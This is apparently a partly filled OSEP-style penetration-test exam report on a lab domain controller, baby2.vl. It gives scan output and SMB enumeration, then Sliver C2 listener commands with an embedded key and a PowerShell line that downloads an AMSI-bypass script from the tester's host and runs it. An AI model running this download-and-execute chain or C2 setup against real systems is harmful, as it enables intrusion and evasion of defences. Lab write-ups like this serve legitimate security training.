Offensive Security Experienced Penetration Tester Exam Report

Detailed Findings and Recommendations

The scope of this penetration test is to identify, exploit and report the results of of penetration test performed on following set of IP addresses.

ID	IPs	Name	DC
Machine 1	10.10.76.112	DC.BABY2.VL

Enumeration

Namp

The initial scan results for machine 1 shows few open port on machine

sudo nmap -sC -sV -oA baby2 10.10.201.37

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus

88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-05-08 14:22:57Z)

135/tcp  open  msrpc         Microsoft Windows RPC

139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn

389/tcp  open  ldap          Microsoft Windows Active Directory LDAP

445/tcp  open  microsoft-ds?

464/tcp  open  kpasswd5?

593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP

3268/tcp open  ldap          Microsoft Windows Active Directory LDAP


3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-05-08T14:24:18+00:00; +6s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: BABY2
|   NetBIOS_Domain_Name: BABY2
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: baby2.vl
|   DNS_Computer_Name: dc.baby2.vl
|   DNS_Tree_Name: baby2.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-05-08T14:23:38+00:00
| ssl-cert: Subject: commonName=dc.baby2.vl

Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Changing /etc/hosts file

cme smb 10.10.79.222 -u 'guest' -p '' --shares

smbclient.py 'guest@10.10.79.222'

Brute force again

smbclient.py 'library:library@10.10.79.222'

• Found login.vbs in sysvol scripts

VBS script

• got the initial shell

whoami /all

Sliver

https -L 10.8.2.41 -l 443

stage-listener --url https://10.8.2.41:8446 --profile vulnhub64 -C deflate9 --aes-encrypt-key D(G+KbPeShVmYq3t6v9y$B&E)H@McQfT --aes-encrypt-iv 8y/B?E(G+KbPeShV

(New-Object System.Net.WebClient).DownloadString('http://10.8.2.41/amsi64.txt') | IEX

Additional Items

Appendix - AMSI Bypass code

Appendix - Powershell Shellcoderunner

Appendix - ANOTHER_SHELLCODE_USED Shellcoderunner Code

Appendix - Risk Assessment Matrix

Appendix - Proof and Local Contents

Hostname	local.txt Contents	proof.txt Contents
HOSTNAME	foo	bar
HOSTNAME	foo	bar

Appendix - Credentials obtained

NTLM Hashes

Username	NTLM Hash	Found in
Administrator	HASH	HOSTNAME

Passwords

Found in	Corresponds to	Password
HOSTNAME	USER BELONGS	Password123*

Credential’s files

Found in	File	Type
HOSTNAME	FILE FROM WHERE IS IT	Example: SSH Priv. Key